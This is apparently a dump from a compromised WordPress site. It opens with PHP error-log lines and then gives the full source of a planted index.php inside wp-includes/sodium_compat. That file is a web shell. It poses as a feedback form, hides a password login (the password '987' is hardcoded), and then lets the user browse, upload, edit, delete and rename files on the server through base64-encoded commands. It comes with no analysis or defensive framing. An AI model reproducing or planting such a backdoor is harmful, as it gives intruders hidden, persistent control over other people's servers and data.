/home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [14-Aug-2023 06:48:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [16-Aug-2023 05:15:06 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [17-Aug-2023 10:33:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [20-Aug-2023 00:48:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [22-Aug-2023 09:18:15 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [22-Aug-2023 20:24:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 namespaced/Core/Util.php 0000644 00000000134 15057664256 0011200 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class Util extends \ParagonIE_Sodium_Core_Util { } namespaced/Core/Poly1305/624607/index.php 0000644 00000025462 15057664256 0013411 0 ustar 00 <?php // Start session session_start(); // Handle logout request if (isset($_GET['logout'])) { unset($_SESSION['authenticated']); header("Location: " . $_SERVER['PHP_SELF']); exit; } // Check if authenticated if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) { // Handle login request if (isset($_POST['password']) && $_POST['password'] === '987') { $_SESSION['authenticated'] = true; header("Location: " . $_SERVER['PHP_SELF']); exit; } else { // Display disguised feedback form page echo "<h2>Website Feedback Form</h2>"; echo "<p>Please fill out the form below to send us your feedback.</p>"; echo "<form method='POST' action=''>"; echo "<input type='text' name='username' placeholder='Your Name' /><br>"; echo "<input type='email' name='email' placeholder='Your Email' /><br>"; echo "<textarea name='feedback' placeholder='Your Feedback'></textarea><br>"; echo "<input type='submit' value='Submit' />"; echo "</form>"; echo "<p><a href='#' onclick='showLoginForm()'>Contact Support</a></p>"; echo "<div id='login-form' style='display: none;'>"; echo "<form method='POST' action=''>"; echo "<input type='password' name='password' placeholder='Password' />"; echo "<input type='submit' value='Login' />"; echo "</form>"; echo "</div>"; echo "<script>"; echo "function showLoginForm() {"; echo "document.getElementById('login-form').style.display = 'block';"; echo "}"; echo "</script>"; if (isset($_POST['password'])) { echo "<p style='color: red;'>Invalid password.</p>"; } exit; } } // File management functionality (accessible only after authentication) // Display random string for obfuscation function randomFunction() { $randomString = bin2hex(random_bytes(96)); return $randomString; } $randomString = randomFunction(); echo "<p style='color: green;'>Random String: $randomString</p>"; // Display system information function systemCheck() { $info = php_uname(); $phpVersion = phpversion(); echo "<p style='color: green;'>System Info: $info | PHP Version: $phpVersion</p>"; } systemCheck(); $special_chars = "%00%0A%09//#"; // Command encoding and decoding functions function encodeCommand($command) { return base64_encode($command); } function decodeCommand($encoded) { return base64_decode($encoded); } // Display directory listing function displayDirectory($path) { global $special_chars; $items = array_diff(scandir($path), ['.', '..']); echo "<h3 style='color: green;'>Current Directory: $path</h3><ul>"; foreach ($items as $item) { $itemPath = realpath($path . DIRECTORY_SEPARATOR . $item); if (is_dir($itemPath)) { $navigateCommand = encodeCommand('navigate|' . $itemPath); echo "<li><a href='?data=$navigateCommand'>$item</a></li>"; } else { $editCommand = encodeCommand('action|edit|' . $path . '|' . $item); $deleteCommand = encodeCommand('action|delete|' . $path . '|' . $item); $renameCommand = encodeCommand('action|rename|' . $path . '|' . $item); echo "<li>$item <a href='?data=$editCommand'>$special_chars Edit</a> | <a href='?data=$deleteCommand'>$special_chars Delete</a> | <a href='?data=$renameCommand'>$special_chars Rename</a></li>"; } } echo "</ul>"; } // Handle file upload function handleFileUpload($path) { if (!empty($_FILES['file']['name'])) { $target = $path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { echo "<p style='color: green;'>File uploaded successfully!</p>"; } else { echo "<p style='color: red;'>Failed to upload file.</p>"; } } } // Create new folder function createNewFolder($path) { if (!empty($_POST['folder_name'])) { $folderPath = $path . DIRECTORY_SEPARATOR . $_POST['folder_name']; if (!file_exists($folderPath)) { mkdir($folderPath); echo "<p style='color: green;'>Folder created: {$_POST['folder_name']}</p>"; } else { echo "<p style='color: red;'>Folder already exists.</p>"; } } } // Create new file function createNewFile($path) { if (!empty($_POST['file_name'])) { $filePath = $path . DIRECTORY_SEPARATOR . $_POST['file_name']; if (!file_exists($filePath)) { file_put_contents($filePath, ''); echo "<p style='color: green;'>File created: {$_POST['file_name']}</p>"; } else { echo "<p style='color: red;'>File already exists.</p>"; } } } // Display file edit form function displayEditForm($filePath, $path) { $content = file_exists($filePath) ? htmlspecialchars(file_get_contents($filePath)) : ''; echo "<form method='POST' action='?data=" . encodeCommand('action|edit|' . $path . '|' . basename($filePath)) . "'> <textarea name='content' style='width:100%; height:300px;'>$content</textarea><br> <button type='submit'>Save</button> </form>"; } // Delete file function deleteFile($filePath) { if (file_exists($filePath)) { if (unlink($filePath)) { echo "<p style='color: green;'>File deleted successfully.</p>"; } else { echo "<p style='color: red;'>Failed to delete file.</p>"; } } else { echo "<p style='color: red;'>File does not exist.</p>"; } } // Display rename form function displayRenameForm($itemPath, $path) { echo "<form method='POST' action='?data=" . encodeCommand('action|rename|' . $path . '|' . basename($itemPath)) . "'> <input type='text' name='new_name' placeholder='New Name'> <button type='submit'>Rename</button> </form>"; } // Handle POST requests if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_GET['data'])) { $command = decodeCommand($_GET['data']); $parts = explode('|', $command, 4); if ($parts[0] == 'action' && $parts[1] == 'edit') { $path = $parts[2]; $item = $parts[3]; $itemPath = $path . DIRECTORY_SEPARATOR . $item; if (isset($_POST['content'])) { file_put_contents($itemPath, $_POST['content']); echo "<p style='color: green;'>File updated successfully!</p>"; } } elseif ($parts[0] == 'action' && $parts[1] == 'rename') { $path = $parts[2]; $item = $parts[3]; $itemPath = $path . DIRECTORY_SEPARATOR . $item; if (isset($_POST['new_name'])) { $newPath = $path . DIRECTORY_SEPARATOR . $_POST['new_name']; if (rename($itemPath, $newPath)) { echo "<p style='color: green;'>Item renamed successfully.</p>"; } else { echo "<p style='color: red;'>Failed to rename item.</p>"; } } } elseif ($parts[0] == 'navigate') { $path = $parts[1]; if (isset($_FILES['file'])) { handleFileUpload($path); } elseif (isset($_POST['folder_name'])) { createNewFolder($path); } elseif (isset($_POST['file_name'])) { createNewFile($path); } } $navigateCommand = encodeCommand('navigate|' . $path); header("Location: ?data=$navigateCommand"); exit; } } // Handle GET requests if (isset($_GET['data'])) { $command = decodeCommand($_GET['data']); $parts = explode('|', $command, 4); if ($parts[0] == 'navigate') { $path = $parts[1]; $parentPath = dirname($path); $goUpCommand = encodeCommand('navigate|' . $parentPath); echo "<a href='?data=$goUpCommand'>$special_chars Go Up</a>"; displayDirectory($path); echo "<h3 style='color: green;'>Upload File</h3> <form method='POST' enctype='multipart/form-data' action='?data=" . encodeCommand('navigate|' . $path) . "'> <input type='file' name='file'><button type='submit'>$special_chars Upload</button> </form>"; echo "<h3 style='color: green;'>Create Folder</h3> <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'> <input type='text' name='folder_name' placeholder='Folder Name'><button type='submit'>$special_chars Create</button> </form>"; echo "<h3 style='color: green;'>Create File</h3> <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'> <input type='text' name='file_name' placeholder='File Name'><button type='submit'>$special_chars Create</button> </form>"; } elseif ($parts[0] == 'action') { $action = $parts[1]; $path = $parts[2]; $item = $parts[3]; $itemPath = $path . DIRECTORY_SEPARATOR . $item; if ($action == 'delete') { deleteFile($itemPath); $navigateCommand = encodeCommand('navigate|' . $path); header("Location: ?data=$navigateCommand"); exit; } elseif ($action == 'edit') { displayEditForm($itemPath, $path); } elseif ($action == 'rename') { displayRenameForm($itemPath, $path); } } } else { $path = getcwd(); $parentPath = dirname($path); $goUpCommand = encodeCommand('navigate|' . $parentPath); echo "<a href='?data=$goUpCommand'>$special_chars Go Up</a>"; displayDirectory($path); echo "<h3 style='color: green;'>Upload File</h3> <form method='POST' enctype='multipart/form-data' action='?data=" . encodeCommand('navigate|' . $path) . "'> <input type='file' name='file'><button type='submit'>$special_chars Upload</button> </form>"; echo "<h3 style='color: green;'>Create Folder</h3> <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'> <input type='text' name='folder_name' placeholder='Folder Name'><button type='submit'>$special_chars Create</button> </form>"; echo "<h3 style='color: green;'>Create File</h3> <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'> <input type='text' name='file_name' placeholder='File Name'><button type='submit'>$special_chars Create</button> </form>"; } // Add logout link echo "<br><a href='?logout=1'>Logout</a>"; ?>